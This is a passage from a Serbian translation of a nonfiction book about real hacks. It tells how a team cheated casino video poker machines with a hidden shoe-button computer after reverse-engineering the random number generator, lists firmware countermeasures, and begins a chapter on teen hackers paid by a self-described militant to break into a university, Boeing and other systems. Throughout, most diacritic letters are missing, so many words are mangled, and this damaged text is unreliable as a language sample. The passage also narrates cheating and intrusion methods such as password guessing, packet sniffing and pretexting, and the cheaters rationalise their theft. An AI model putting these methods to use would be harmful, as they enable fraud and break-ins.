in, s minijaturnim dugmetom. Zaili smo i pare lastia koje e ii oko palca. Onda iseete rupu u uloku Dr. Sholl da bi ureaj stojao mirno u cipeli. Bilo je neudobno samo ako ste ga nosili ceo dan tada je postajalo pravo muee. Aleks: I onda uete u kazino i pokuavate da izgledate smireno, ponaate se kao da nema niega, kao da vam pantalone nisu pune ica. Odete tamo i ponete da igrate. Imali smo ifru, kao Morzeova azbuka. Ubacite pare i napravite neto kredita da ne biste morali stalno da ubacujete novie, i ponete da igrate. Oznake za podeene karte unesete pritiskajui dugme u cipeli. Signal od dugmeta u cipeli odlazi do raunara u depu pantalona. Za ranije maine trebalo je sedam ili osam karata da biste sinhronizovali raunar. Aparat podeli pet karata, povuete jo tri, to je uobiajena stvar. Na primer, zadrite par, a zamenite ostale tri, i dobijete osam karata. Majk: Kd koji ste ukucavali preko dugmeta u cipeli bio je binaran i koristio je tehniku komprimovaa slinu onome to se naziva Hafmanov kd. Tako je dug pa kratak pritisak oznaavao jedan-nula, to je binarna oznaka za dva. Dva duga pritiska bila su jedan-jedan, binarna oznaka za tri, itd. Ni za jednu kartu nam nije trebalo vie od tri pritiska. Aleks: Ako ste dugme drali pritisnuto tri sekunde, to je znailo otkazivae. I [raunar] se odazivao na primer, dupdup-dup je znailo OK, spreman sam za unos. Unoee podataka smo vebali morali smo da se koncentriemo i uimo kako se to radi. Nakon nekog vremena, mogli smo da ukucavamo i dok smo razgovarali sa osobem u kazinu. Poto bih uneo kd i identifikovao oko osam karata, to je bilo dovono za sinhronizovae sa oko 99 procenata sigurnosti. Otprilike u roku od nekoliko sekundi do minut, raunar bi triput zazujao. Spreman sam za akciju.
Raunar u depu pronaao je mesto u algoritmu koje predstava upravo podeene karte. Poto je egov algoritam bio isti kao onaj u video poker aparatu, za svako novo deee raunar je znao kojih pet dodatnih karata eka nakon to igra izabere karte koje e odbaciti, i signalizirao je koje karte treba zadrati da bi se osvojio dobitak. Aleks je nastavio:
16 Umee provale
Raunar vam java ta da uradite tako to ae signale vibratoru u vaem depu. Vibratore smo nabavili besplatno tako to smo ih iupali iz starih pejdera. Ako treba da zadrite treu i petu kartu, kompjuter bi se oglasio sa bip, bip, biiip, bip, biiip, to ste oseali kao vibracije u svom depu. Izraunali smo da, ako igramo paivo, imamo izmeu 20 i 40 procenata dobiti, to znai prednost od 40 procenata u svakom deeu. To je odlino najboi svetski igrai blek deka ostvare oko dva i po procenta. Ako sedite za aparatom u koji se ubacuje 5 dolara i odjednom ubacujete po pet kovanica, dvaput u minutu, moete zaraditi 25 dolara za minut. Za pola sata mogli biste lako zaraditi 1.000 dolara. Svaki dan se nekome tako posrei. Oko 5 procenata igraa koji sede i igraju pola sata mogli bi postii toliko. Ali to im se ne deava svaki put. Mi smo bili u tih 5 procenata kad god bismo seli.
Svaki put kada bi neko od ih osvojio veu sumu u jednom kazinu, preao bi u drugi. Obino su uzimali po etiri ili pet dobitaka zaredom. Kada bi se posle mesec dana vratili u taj kazino, posetili bi ga u drugo doba dana da bi zatekli drugu smenu osoba, ude koji ih nee prepoznati. Poeli su da poseuju i kazina u drugim gradovima Rinou, Atlantik Sitiju itd. Putovaa, kockae i osvajae, postepeno su postali rutina. Meutim, jednom prilikom Majk je mislio da je doao trenutak od kog su svi strepeli. Upravo se naotrio i prvi put je igrao na aparatu u koji se ubacuje 25 dolara, to je poveavalo napetost to je vrednost maine vea, to vas paivije posmatraju.
Bio sam pomalo nervozan, ali stvari su ile boe nego to sam oekivao. Osvojio sam oko 5.000 dolara za relativno kratko vreme. A onda me je jedan ogroman tip potapao po ramenu.
Pogledao sam ga oseajui blagu muninu u stomaku. Pomislio sam: To je to. Primetio sam da ve neko vreme igrate, rekao je. elite li roze ili zelenu?
Da sam to bio ja, zapitao bih se: ta da izaberem boju koje elim da budem kada me prebiju na mrtvo ime? Mislim da bih ostavio sav svoj novac i pokuao da zbriem. Majk kae da je ve bio dovono iskusan da ostane smiren.
ovek je rekao: elimo da vam poklonimo ou za kafu.

Majk je odabrao zelenu. Marko je imao sopstveni napet momenat. ekao je na dobitno deee kada mu je priao nadzornik kog nije primetio. Udvostruili ste sumu na pet hiada dolara ba imate sree, rekao je iznenaeno. Starija gospoa za susednim aparatom progovorila je hrapavim glasom puaa: Nije to... bila... srea. Nadzornik se ukoio, i postao sumiav. To je bila peta, zagraktala je. Nadzornik se nasmeio i otiao dae. Tokom oko tri godine, momci su naizmenino obavali legalne poslove savetovaa kako bi ouvali svoje vetine i kontakte, i povremeno punili depove za poker aparatima. Kupili su jo dva aparata, ukuujui i najvie korien model video pokera i nastavili da poboavaju svoj softver. Na putovaima je svaki od tri lana tima iao u razliit kazino, nisu ili u oporu, priao je Aleks. Tako smo otili samo jednom ili dvaput, ali to je bilo glupo. Iako su se dogovorili da e jedan drugom javati ta nameravaju, povremeno bi se neko od ih iskrao u kockarske gradove ne prijavujui ostalima. Igrali su samo u kazinima, nikad na mestima kao to su dragstori ili supermarketi, jer su tamo dobici uglavnom vrlo mali.
Uhvaen!
Aleks i Majk su se trudili da se disciplinovano dre odreenih pravila koja e sigurno smaiti verovatnou da nas primete. Na primer, pazili smo da nikada ne uzimamo previe novca na istom mestu, da na istom mestu nikada ne osvajamo novac previe esto, da ne uzimamo novac mnogo dana zaredom.
18 Umee provale
Ali Majk je tu disciplinu shvatao ozbinije i smatrao je da druga dvojica nisu dovono oprezni. Vie je voleo da osvaja neto mae novca na sat, ali da izgleda kao i drugi tipini igrai. Ako bi deeem dobio dva keca, a kompjuter mu rekao da odbaci jednog ili oba keca da bi dobio jo boe karte na primer tri andara on to nije radio. U svim kazinima postoje kamere kojima uprava obezbeee smeteno iznad dvorane za kockae. One se mogu okretati, fokusirati i zumirati u potrazi za prevarantima, podmienim slubenicima kazina i drugima koji nisu uspeli da odole tolikom novcu. Ako bi se desilo da neko iz obezbeea viri u Majkov aparat, odmah bi znao da tu nisu ista posla nijedan razuman igra ne bi odbacio par keeva. Niko ko ne vara ne bi pomislio da slede jo boe karte. Aleks nije imao tako visoke standarde. Markovi su bili jo nii. Marko je bio prilino drzak po Aleksovom mieu:
On je vrlo pametan tip, samouk, nikada nije zavrio sredu kolu, ali je bio jedan od onih sjajnih Istonoevropana. I bio je vrlo uoiv. Znao je sve o raunarima, ali je umislio da su udi zaposleni u kazinima glupi. Nije bilo teko pomisliti tako neto s obzirom na to da smo uspevali da im izvuemo toliki novac. Pa ipak, ini mi se da je postao previe samouveren. Previe se osilio, a nije se ni uklapao u profil tipinog igraa jer je izgledao kao klinac iz inostranstva. Mislim da je zato budio sume. Takoe, nije iao sa devojkom ili suprugom, koja bi pomogla da se boe uklopi. Mislim da je na kraju poeo da radi stvari koje su privlaile pau. Takoe, kako je vreme prolazilo, svi smo se okuraili, pa smo poeli da igramo na skupim aparatima koji su davali boe dobitke, to je operaciju inilo rizinijom. Iako se Majk s tim ne slae, Aleks je nagovestio da su sva trojica voleli da rizikuju i da su stalno pomerali granice proveravajui koliko daleko mogu da idu. O tome je rekao: Jednostavno, stalno poveavate rizik. Doao je dan kada je Marko u jednom trenutku sedeo za aparatom u kazinu, a u sledeem je bio okruen gomilom udi iz obezbeea koji su ga vukli i gurali u zadu sobu za razgovor. Aleks je prepriao dogaaj.
Bilo je strano jer ste stalno sluali prie o tim tipovima koji mlate ude kao volove u kupusu. Oni su bili uveni po geslu J_ policiju, sami emo se postarati za ovo. Marko je bio uplaen, ali on je vrlo vrst lik. Na neki nain mi je drago to je ba on uhvaen, ako je iko od nas morao da padne, jer mislim da je on bio najsposobniji da se izbori s tom situacijom. Koliko znam, sline stvari je preiveo u Istonoj Evropi. Pokazao je lojalnost i nije nas izdao. Nije pomiao partnere niti bilo ta slino. Bio je nervozan i uznemiren, ali je ostao vrst pred pabom i rekao im je da je radio sam. Rekao je: ekajte, da li sam ja uhapen, jeste li vi policija, u emu je stvar? Bilo je to ispitivae kao u kriminalistikoj slubi, osim to ti udi nisu bili policija i nisu imali nikakav stvaran autoritet, to je pomalo udno. Nastavili su da ga ispituju, ali ga nisu stvarno maltretirali.
Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac koji je imao oko 7.000 dolara u keu. Nakon oko jednog sata ispitivaa, ili moda due bio je previe uzrujan da bi bio siguran koliko je trajalo pustili su ga. Marko je pozvao svoje partnere na putu kui. Zvuao je izbezumeno. Rekao je: Da vam ispriam ta se desilo. Zeznuo sam stvar. Majk je odmah otiao u ihov tab. Aleks i ja smo iznuli kada smo uli ta se desilo. Ja sam poeo da rastavam aparate i bacam delove svud po gradu. Aleks i Majk su bili uti to je Marko nepotrebno rizikovao. Nije hteo da postava dugme u cipelu kao ih dvojica, tvrdoglavo insistrajui da ureaj nosi u depu jakne i pokree ga rukom. Aleks je opisao Marka kao tipa koji je mislio da su udi iz obezbeea toliko glupi da je mogao pod ihovim nosem da bude sve drskiji. Aleks je ubeen da zna ta se desilo, iako nije bio prisutan. (Zapravo, ih trojica nisu znali da je Marko otiao u kazino, uprkos dogovoru da se meusobno obavetavaju o planovima.) Po Aleksovom mieu,
20 Umee provale
Videli su da on osvaja nemogue sume i da se neto udno deava s egovom rukom. Marko prosto nije brinuo o tome ta bi moglo skrenuti pau osoba i pobuditi sumu. To je bio kraj i za Aleksa, mada nije skroz siguran da su i ostali prestali da varaju. Na poetku smo odluili da, ako iko od nas bude uhvaen, svi prestajemo. Rekao je: Koliko ja znam, svi smo se toga pridravali. Ubrzo zatim je, mae siguran, dodao: Bar ja jesam. Majk se sloio, ali nijedan od ih nikada to pitae nije direktno postavio Marku. Kazina obino ne tue napadae poput ih etvorice. Razlog za to je to ne ele da objave da imaju ovakve slabosti, objaava Aleks. Obino se zavrava reima: Izgubi se pre zalaska sunca. Pustiemo te ako obea da vie nikada nee kroiti u ovaj kazino.
Epilog
Oko est meseci kasnije, Marko je primio pismo u kom je pisalo da protiv ega nee biti podneta tuba. Njih etvorica su i dae prijatei, mada danas nisu toliko bliski. Aleks misli da je u ovoj avanturi zaradio oko 300.000 dolara, a deo tog novca otiao je Lariju, kao to su se dogovorili. Tri partnera koja su ila u kazina i preuzela sav rizik, prvo su se dogovorila da e podeliti novac na jednake delove, ali Aleks misli da su Majk i Marko verovatno uzeli oko 400.000 do pola miliona dolara svaki. Majk nije potvrdio da je dobio vie od 300.000 dolara, ali priznaje da je Aleks verovatno izvukao mae od ega. Radili su oko tri godine. Uprkos novcu, Aleks je bio srean kada je bilo gotovo: Na neki nain, osetio sam olakae. Sva zabava je iezla. To nam je postalo kao posao. I to rizian. Ni Majku nije bilo krivo to se sve zavrilo, i blago se alio da je postalo nekako naporno. Obojica su na poetku oklevali da ispriaju svoju priu, ali su sa uivaem prihvatili zadatak. A zato i ne bi tokom desetak godina otkako se sve desilo, nijedan od ih etvorice nikada nikome nije ni proaputao o tim dogaajima osim suprugama i devojci, koje su bile deo cele stvari. Na neki nain, bilo je olakae ispriati sve po prvi put, pod zatitom dogovora o potpunoj anonimnosti. Oigledno su uivali u otkrivau detaa, a Majk je priznao: To je bila jedna od najuzbudivijih stvari koje sam ikada uinio.
Aleks verovatno govori u ime svih iznosei svoj stav o ovoj ludoriji:
Ne oseam se nimalo loe zbog novca koji smo uzeli. To je samo kap u moru novca u toj industriji. Da budem iskren, nikada nismo oseali griu savesti, jer su to kazina. Sve smo lako racionalizovali. Krali smo od kazina koji su krali starim gospoama nudei igre u kojima ne mogu da dobiju. Vegas je kao mesto u kom su udi utaknuti u maine za isisavae novca, i one im isisavaju ivot novi po novi. Oseali smo se kao da se svetimo Velikom Bratu, a ne kao da nekoj jadnoj starici otimamo dek pot. Napravili su igru u kojoj se kae Izaberi odgovarajue karte i dobie novac. Mi smo birali odgovarajue karte. Jedino to oni nisu oekivali da to ikome poe za rukom.
Aleks kae da tako neto danas ne bi pokuao. Meutim, egovi razlozi e vas moda iznenaditi: Pronaao sam druge naine da doem do novca. Da je moja finansijska situacija ista kao tada, verovatno bih pokuao opet. Misli da je ono to su uradili sasvim opravdano. U ovoj igri make i mia, maka stalno ui nove trikove koje mi izvodi i preduzima odgovarajue mere. Slot maine danas koriste mnogo boi softver, pa momci nisu sigurni da li bi uspeli ponovo da ih provale. Ipak, nikada nee postojati savreno reee za bilo koje pitae tehnoloke bezbednosti. Aleks je taj problem slikovito predstavio: Svaki put kada neki [programer] kae: Niko se nee muiti oko toga, nae se klinac u Finskoj raspoloen da se pomui. I to ne samo u Finskoj, nego i u Americi.
SAETAK
Tokom devedesetih, kazina i projektanti kockarskih aparata nisu shvatali neke stvari koje su kasnije postale oigledne. Generator pseudosluajnih brojeva ne generie zaista nasumine brojeve. Umesto toga, on skladiti listu nasumino poreanih brojeva. U ovom sluaju, to je veoma duga lista: sa stepenom od 2 do 32, ili otprilike milijardu brojeva. Na poetku ciklusa, program nasumino bira mesto u listi. Ali nakon toga, sve dok ne pone nov ciklus igre, on koristi sledee brojeve sa liste, jedan za drugim.
Reverznim ineeringom (tj. povratnom analizom) softvera momci su doli do liste. Sa bilo koje poznate take u nasuminoj listi, oni su mogli da utvrde sledei broj na listi, a pomou dodatnog poznavaa brzine ponavaa za konkretnu mainu, mogli su da odrede koliko e minuta i sekundi proi pre nego to aparat prikae fle rojal.
PROTIVMERE
22 Umee provale
Proizvoai svakog proizvoda koji koristi ROM ipove i softver moraju predvideti bezbednosne probleme. A svaka kompanija koja koristi proizvode zasnovane na softveru i raunarima to danas znai gotovo svaka kompanija, sve do radi s jednim ovekom bie u opasnosti ako pretpostavi da su tvorci sistema razmiali o svim egovim slabostima. Programeri softvera u japanskim slot aparatima napravili su greku jer nisu razmiali mnogo unapred o svim vrstama napada koji bi mogli biti izvedeni. Nisu preduzeli nikakve mere bezbednosti kojima bi spreili ude da dou do firmvera. Trebalo je da predvide da e neko doi do aparata, ukloniti ROM ip, proitati firmver i doi do programskih instrukcija koje aparatu govore kako da radi. ak i ako su razmotrili tu mogunost, verovatno su pretpostavili da smo poznavae naina rada maine nije dovono, i smatrali da e sloenost izraunavaa potrebnih za provaivae generatora sluajnih brojeva osuditi svaki takav pokuaj na neuspeh. To je danas moda i tano, ali u ono vreme nije bilo. Recimo da vaa kompanija prodaje hardverske proizvode koji sadre kompjuterske ipove. ta treba da uradite da biste obezbedili adekvatnu zatitu protiv suparnika koji hoe da zaviri u va softver, protiv strane kompanije koja hoe da napravi jeftinu kopiju, ili hakera koji hoe da vas prevari? Prvi korak: oteajte dolazak do firmvera. Za to postoji nekoliko naina, ukuujui sledee: Kupujte ipove koji su napraveni tako da su osigurani od napada. Nekoliko kompanija prodaje ipove dizajnirane specijalno za situacije kada postoji velika opasnost od napada. Koristite pakovae chip on-board dizajn u kom je ip ugraen u plou sa elektronskim kolima i ne moe se izdvojiti kao poseban element.
Zapeatite ip epoksidnom smolom, pa e se slomiti ako neko pokua da ga ukloni s ploe. Da biste poboali ovu tehniku, u smolu dodajte aluminijumski prah. Ukoliko napada pokua da ukloni ip zagrevaem smole, aluminijum e ga unititi. Koristite dizajn Ball Grid Array (BGA). U takvom rasporedu konektori ne izlaze iz bokova ipa, ve ispod ega, pa je teko, ak i nemogue, uhvatiti tok signala iz ipa dok je on postaven na plou. Jo jedna protivmera je uklaae svih oznaka sa ipa. Time ete napadaa liiti informacija o proizvoau i vrsti ipa. Prilino uobiajen postupak, koji su koristili proizvoai aparata iz ove prie, zahteva koriee kontrolnih zbirova (heirae) ukuivae rutine check-sum u softver. Ukoliko se program izmeni, kontrolni zbir nee biti ispravan i softver nee pokrenuti ureaj. Meutim, umeniji hakeri koji su upoznati sa ovim pristupom, jednostavno pregledaju softver da bi videli postoji li u emu rutina check-sum, i iskue je ukoliko je pronau. Znai, mnogo je boe da iskoristite jednu ili vie metoda fizike zatite ipa.
ZAKLJUAK
Ukoliko je va firmver privatan i vredan, pregledajte najboe izvore podataka o bezbednosti i otkrijte koje tehnike hakeri trenutno koriste. Prenosite najnovije informacije svojim projektantima i programerima. I obavezno preduzmite sve odgovarajue korake da biste postigli najvii nivo bezbednosti srazmeran trokovima koje biste mogli imati zbog upada.
Poglavlje 2
Kad teroristi pozovu
Ne znam zato sam nastavio s tim. Zbog opsesivne prirode? ei za novcem? ude za moi? Mogao bih nabrojati mnogo razloga. ne0h
vadesetogodii haker koji se potpisuje kao Comrade (Drug) ovih dana provodi vreme u kui u finom kraju Majamija, koja pripada emu i egovom bratu. Otac ivi s ima, ali samo zato to je brat jo uvek maloletan, a Sluba za brigu o deci zahteva da odrasla osoba ivi u kui dok deak ne napuni 18. Brai to ne smeta, a tata ima svoj stan na drugom mestu, i preselie se u ega kad za to doe vreme. Comradeova mama je umrla pre dve godine i ostavila kuu sinovima jer su ona i ihov otac bili razvedeni. Ostavila im je i neto gotovine. Njegov brat ide u sredu kolu, a Comrade samo visi po kraju. Vei deo porodice to ne odobrava, ali on kae da ga uopte nije briga. Kada vrlo mladi dospete u zatvor zapravo, ako ste najmlaa osoba koja je ikada osuena kao haker na osnovu federalne optunice iskustvo e verovatno promeniti va sistem vrednosti. Naravno, hakerisae ne poznaje meunarodne granice, pa nije udno to je Comradeov prijate haker, ne0h (nio), otprilike 4.500 km daleko. Hakerisae ih je zbliilo i skrenulo ih na stranputicu koja je, ispostavilo se, vodila slueu interesima meunarodnog terorizma preko upada u veoma osetive raunarske sisteme. Danas nije lako nositi se s tim teretom.
25
Godinu dana stariji od Comradea, ne0h kae: Koristio sam raunare otkad sam mogao da dohvatim tastaturu. Njegov otac je imao prodavnicu raunarske opreme i vodio je deaka sa sobom na sastanke s klijentima. Deak je sedeo na oevom krilu tokom prodaje. Do svoje jedanaeste godine ve je pisao dBase kd za potrebe oevog posla. U meuvremenu, ne0h je naiao na kopiju kige Takedown (Hyperion Press, 1996) veoma netaan opis mojih hakerskih akcija, moje tri godine u bekstvu, i potrage FBI-ja za mnom. ne0h je bio oaran kigom:
26 Umee provale
Inspirisao si me. Ti si bio moj j_ni mentor. Proitao sam sve o onome to si radio. Hteo sam da postanem slavan kao ti.
To ga je motivisalo da postane haker. Svoju sobu je opremio raunarima, razvodnicima za umreavae, gusarskom zastavom dugom dva metra i krenuo mojim stopama. ne0h je poeo da stie solidno hakersko znae i sposobnosti. Prvo je stekao vetine, a diskrecija je dola kasnije. Koristei hakerski termin za klince poetnike, objasnio je: Dok sam pisao deje skriptove, meao sam matine strane Web prezentacija i ostavao svoju adresu e-pote. Visio je na IRC prezentacijama (engl. Internet Relay Chat, interaktivni razgovor na Internetu) elektronskim priaonicama u kojima se sreu udi sa zajednikim interesovaima i u realnom vremenu razmeuju poruke o pecau, starim avionima, kunim pivarama, ili bilo kojoj od hiada drugih tema, ukuujui i hakerisae. Kada na IRC prezentaciji unesete tekst, svi koji su u to vreme na mrei videe ta ste napisali i mogu vam odgovoriti. Mada to mnogi redovni korisnici IRC-a ne znaju, komunikacija se lako moe evidentirati. Te evidencije dosad verovatno sadre skoro isti broj rei kao sve kige u Kongresnoj biblioteci a do teksta upisanog u urbi, bez previe razmiaa o posledicama, moe se doi godinama kasnije. Comrade i ne0h su provodili vreme na nekoliko istih IRC prezentacija i tako se rodilo prijatestvo na dainu. Hakeri se esto udruuju radi razmeivaa informacija ili izvoea grupnih napada. ne0h, Comrade i jo jedan klinac odluili su da naprave sopstvenu grupu koju su nazvali Keebler Elves. Jo nekoliko hakera je imalo pristup razgovorima grupe, ali tri prva lana nisu ostalima govorili o svojim napadima. Provaivali smo u vladine prezentacije radi zabave, rekao je Comrade. Proceuje da su provalili u par stotina navodno zatienih vladinih prezentacija.
Razliite grupe hakera okupaju se na nekoliko IRC kanala. Meu ima se izdvaja mrea Efnet. To je prezentacija koju Comrade opisuje kao ne ba kompjutersko podzeme to je prilino velika grupa servera. Ali, na Efnetu je bilo nekih mae poznatih kanala, mesta koja niste mogli sami da pronaete, ve je za ih morao da vam kae drugi haker ije ste poveree zadobili. Ti kanali su, kae Comrade, bili prilino ilegalni.
Terorista Kalid baca mamac

Oko 1998, na tim prilino ilegalnim kanalima, Comrade je poeo da nailazi na razgovore o tipu koji se motao unaokolo, a predstavao se kao RahulB. (Kasnije je koristio i identifikaciju Rama3456). Svima je bilo poznato da je on traio hakere koji e upadati u vladine i vojne raunare prezentacije .gov i .mil, kae Comrade. Kruile su glasine da je on radio za Bin Ladena. To je bilo pre 11. septembra, pa Bin Laden nije bilo ime koje ste mogli svaki dan uti u vestima. Na kraju su se Comradeovi putevi ukrstili s putevima tajanstvenog oveka koji e mu se predstaviti kao Kalid Ibrahim. Razgovarao sam s im nekoliko minuta [na IRC-u] i jednom smo priali telefonom. ovek je imao strani akcenat i definitivno je zvualo kao da zove iz inostranstva. I ne0h je stupio s im u vezu. Kalid je s im bio direktniji i otvoreniji.
27 Poglavlje 2: Kad teroristi pozovu
Oko 1999, sa mnom je putem e-pote u kontakt stupio ovek koji je rekao da je militantni aktivista i da se nalazi u Pakistanu. Predstavio se kao Kalid Ibrahim. Rekao mi je da je radio za pakistanske militantne grupe.
Da li bi neko u potrazi za naivnim klincima hakerima zaista sebe obeleio kao teroristu ak i pre 11. septembra? Na prvi pogled to zvui apsurdno. Taj ovek je kasnije tvrdio da je iao u kolu u SAD, da se i sm pomalo bavio hakerisaem, i da se povezao s hakerima dok je bio u Americi. U tom sluaju, on je mogao znati, ili je mislio da zna, kako hakeri razmiaju. Svaki haker je do neke mere buntovnik koji ivi po razliitim standardima i uiva u savladavau sistema. Ako hoete da privuete hakera, moda i nije tako glupo objaviti da i sami krite pravila i da ste autsajder. Moda bi pria upravo tako postala uverivija, a potencijalni sauesnici mae oprezni i sumiavi.
28 Umee provale
A bilo je tu i novca. ne0h je od Kalida dobio ponudu od 1.000 dolara da upadne u raunarske mree jednog kineskog univerziteta mesto koje ne0h naziva kineski MIT (MIT Tehnoloki institut Masausetsa) i iz baze nabavi podatke o studentima. Pretpostavio je da je to test i za egove hakerske sposobnosti i za egovu genijalnost: kako da upadnete u raunarski sistem kada ne umete da itate jezik? I jo tee: kako da se lano predstavite kada ne govorite jezik? Ispostavilo se da jezik nije nikakva prepreka za nekog kao to je ne0h. Poeo je da boravi na IRC prezentacijama koje je koristila hakerska grupa gLobaLheLL i preko te grupe se povezao sa studentom raunarskih nauka na kineskom univerzitetu. Povezao se s im i zatraio nekoliko korisnikih imena i lozinki. Informacije za prijavivae stigle su ubrzo zatim, po sistemu haker hakeru, bez postavaa pitaa. ne0h je otkrio da je bezbednost raunara na univerzitetu bila slaba do uasna, to je naroito neobino za tehniki univerzitet za koji bi se oekivalo da moe mnogo boe. Veina studenata imala je lozinke iste kao korisnika imena istu re ili frazu. Kratka lista koju je student dostavio bila je dovona da ne0h dobije pristup kako bi mogao da pone elektronsko ukae. Tako je otkrio studenta zvaemo ga eng koji je pristupao FTP prezentacijama (za preuzimae podataka) u SAD. Meu tim FTP lokacijama, bila je i warez prezentacija mesto za preuzimae piratskog softvera. Koristei standardan trik lanog predstavaa, ne0h je skitao po mrei fakulteta i skupao lokalni studentski argon. To je bilo lake nego to se ini jer oni uglavnom govore engleski, kae ne0h. Sa engom se povezao preko naloga koji je omoguio da sve izgleda kao da mu ne0h ae poruke iz laboratorije za raunarske nauke na fakultetu. Ja sam iz Bloka 213, elektronski je rekao engu, i direktno mu zatraio imena studenata i adrese e-pote, kao to bi uradio svaki drugi student zainteresovan za kontakt s kolegama. Poto je veina lozinki bila jednostavna, ulazak u studentske datoteke nije iziskivao previe mozgaa. Vrlo brzo mogao je da isporui Kalidu podatke iz baze o otprilike sto studenata. Dao sam mu to, a on je rekao: Imam sve to mi treba. Kalid je bio zadovoan. Oigledno mu ta imena uopte nisu trebala, samo je hteo da vidi moe li ne0h zaista da pribavi informacije iz tako udaenog izvora. Otprilike tada je poela naa veza, kae ne0h. Mogao sam da obavim posao, on je to znao, i poeo je da mi daje druge zadatke.
Rekavi da e mu ugovorenih hiadu dolara poslati potom, Kalid je poeo da zivka mobilnim otprilike jednom nedeno, kako kae ne0h, obino dok je vozio. Sledei zadatak bio je upad u raunarski sistem indijskog Centra za istraivae atomske energije (Bhabha Atomic Research Center). Centar je koristio radnu stanicu Sun koja je poznata svim hakerima. ne0h je lako uao u u, ali je otkrio da maina ne sadri nikakve zanimive informacije i da je samostalna nije povezana ni sa jednom mreom. Kalid nije delovao zabrinuto zbog neuspeha. U meuvremenu, novac za upad u kineski univerzitet nije stigao. Kada je ne0h pitao za ega, Kalid se iznervirao. Nisi ga dobio? Poslao sam ti ke u roendanskoj estitki!, tvrdio je. Bila je to otrcana fraza: Poslali smo ek potom, ali je ne0h ipak rado nastavio da prihvata zadatke. Zato? Danas odgovor na to trai introspekcijom.
Nastavio sam jer sam tvrdoglav. Uzbuivala me je pomisao da u biti plaen za to to radim. I mislio sam: Moda se novac stvarno usput zaturio, moda e mi ovaj put platiti. Ne znam zato sam nastavio s tim. Zbog opsesivne prirode? ei za novcem? ude za moi? Mogao bih nabrojati mnogo razloga.
U isto vreme dok je dodeivao zadatke da ih ne0h reava, Kalid je krstario IRC prezentacijama traei druge zainteresovane igrae. Comrade je bio zainteresovan, mada je bio oprezan kada je trebalo prihvatiti novac.
Koliko sam shvatio, on je plaao udima, ali ja nikada nisam hteo da mu dam svoje podatke kako bih primio novac. Pomislio sam to to ja radim samo je razgledae, ali ako ponem da primam pare, postau pravi kriminalac. S im sam uglavnom razgovarao preko IRC-a i s vremena na vreme mu dobacivao poneku datoteku sa IP adresama sistema.
Novinar Nil Makaj razgovarao je s jo jednom ribom koju je Kalid upecao u svoju mreu tinejderom iz Kalifornije ija je identifikacija bila Kameleon (Chameleon), i koji je danas suosniva uspene kompanije za bezbednost. Pria koju je Makaj objavio na prezentaciji wired.com1, poklapala se sa detaima koje su ispriali ne0h i Comrade. Jedne noi sam bio na IRC-u kada je taj tip rekao da mu treba DEM softver. Ja ga
30 Umee provale
nisam imao i samo sam se izmotavao s im, tvrdio je haker. Kalid se u to vreme ve uozbiio: DEM je skraenica za Defense Information Systems Network Equipment Manager softver za mree koji je koristila vojska. Program je skinula grupa hakera Masters of Downloading, i kruile su glasine da do ega moete doi ako ga zatraite od prave osobe. Niko ne zna da li se Kalid ikada doepao tog programa ili bar niko nee da prizna. Zapravo, nije potpuno sigurno ni da bi mu taj softver ita vredeo ali on je oigledno mislio da bi. Kalid je zavrio svoje igre s kineskim univerzitetima i slinim sitnim poslovima. Pokuao je da se ukui u ono to su momci u grupi radili, priao nam je ne0h. Kalid se javao hakerima tokom godinu i po dana: Nije bio neko ko bi se sporadino pojavivao, javao se redovno. Bio je tu i svi su znali da je to egova stvar. Kada kae egova stvar, ne0h misli na upadae u vojne prezentacije ili raunarske sisteme komercijalnih kompanija koje rade na vojnim projektima. Kalid je traio da ne0h upadne u Lockheed Martin i nabavi eme odreenih avionskih sistema koji su se u toj kompaniji pravili za Boing. ne0h je uspeo da delimino prodre u Lockheed, oko tri koraka u unutrau mreu, ali nije uspeo da ode dube od dva servera (doao je do nivoa koji udi iz bezbednosti nazivaju demilitarizovana zona ili DMZ niija zema). To nije bilo dovono da proe barijere koje su titile najosetivije korporacijske podatke, i nije mogao da pronae zahtevane informacije.
[Kalid] se razdraio. Otprilike je rekao: Vie ne radi za mene. Ne moe nita da obavi. Ali onda me je optuio da sam zadrao informacije za sebe. Potom je rekao: Zaboravi Lockheed Martin. Idi direktno na Boing.
ne0h je otkrio da Boing nije toliko obezbeen, ako se dovono potrudite. On je upao iskoristivi poznatu slabost Boingovog sistema izloenost Internetu. Poto je instalirao ukalo (program za nadgledae protoka podataka, engl. sniffer), mogao je da oslukuje sve pakete podataka koji su ulazili u raunar i izlazili iz ega program je radio kao prisluni ureaj za raunare. Tako je doao do lozinki i neifrovanih e-poruka. Informacije koje je skrpio iz e-poruka otkrile su dovono podataka za ulazak u internu mreu.
Pronaao sam est ili sedam ema za vrata i nos Boinga 747 samo prolazei kroz tekstualne e-poruke. Ljudi su slali neifrovane priloge uz poruke. Zar to nije sjajno?! (Tu se zasmejao.) Kalid je bio ushien. Rekao je da e mi dati 4.000 dolara. To se, naravno, nikada nije desilo.
Zapravo, 4.000 dolara bi bilo previe za te informacije. Sudei po bivem direktoru bezbednosti Boinga, Donu Belingu, ovaj upad se moda zaista desio kao to je opisano. Meutim, on bi bio isto gubee vremena: kada nov tip aviona ue u eksploataciju, sve putnike agencije dobijaju kompletne skupove ema. U tom trenutku, te informacije se vie ne smatraju osetivim. Moe ih dobiti svako ko poeli. Nedavno sam na lokaciji eBay video i CD sa emama za 747, rekao je Don. Naravno, Kalid to verovatno nije znao. Prolo je dve godine dok nacija nije otkrila da su neki teroristi imali jake razloge da ele eme glavnih putnikih aviona koje koriste amerike avionske kompanije.
Veeraa meta: SIPRNET

Kalid se nije trudio da Comradeu daje probne zadatke. Od samog poetka, pria ovaj haker, Kalida su zanimali samo vojska i SIPRNET.
On uglavnom nije konkretno govorio ta hoe hteo je pristup vladinim i vojnim prezentacijama. Osim kada je u pitau bio SIPRNET. Informacije sa SIPRNET-a je zaista eleo.
Nije ni udo to je Kalid udeo za tim podacima. Oni su verovatno bili egov ci od samog poetka. SIPRNET je deo mree odbrambenog informacionog sistema, DISN-a (engl. Defense Information System Network), koji prenosi poverive poruke. tavie, SIPRNET (skraenica za Secret Internet Protocol Router Network) sada je sr komandovaa i kontrole u vojsci SAD. ne0h je ve odbio Kalidovu ponudu da prodre u SIPRNET:
Ponudio je 2.000 dolara. Odbio sam ga. Da sam uao u SIPRNET, federalci bi mi zaas doli na vrata. 2.000 dolara nije vredno rupe u glavi.
Kada je Kalid razgovarao s Comradeom o tom zadatku, cena je skoila. Mislim da je rekao da e platiti deset hiada dolara za pristup,
